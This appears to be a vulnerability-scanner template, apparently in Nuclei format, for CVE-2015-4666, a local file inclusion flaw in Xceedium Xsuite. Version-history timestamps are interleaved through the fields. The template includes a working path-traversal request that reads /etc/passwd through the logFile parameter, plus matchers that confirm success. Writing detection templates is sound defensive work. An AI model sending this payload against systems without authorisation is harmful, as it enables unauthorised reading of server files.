2022-07-10 22:43:04 +00:00
id : CVE-2015-4666
2022-07-26 13:45:11 +00:00
2022-07-10 22:43:04 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Xceedium Xsuite <=2.4.4.5 - Local File Inclusion
2022-07-10 22:43:04 +00:00
author : 0x_Akoko
severity : high
2022-07-26 13:45:11 +00:00
description : Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.
2022-07-10 22:43:04 +00:00
reference :
- https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt
2022-07-11 17:58:16 +00:00
- http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2015-4666
2022-07-10 22:43:04 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2015-4666
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : xceedium,xsuite,lfi,packetstorm,cve,cve2015
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2022-07-10 22:43:04 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-10 22:43:04 +00:00
- method : GET
path :
- "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/13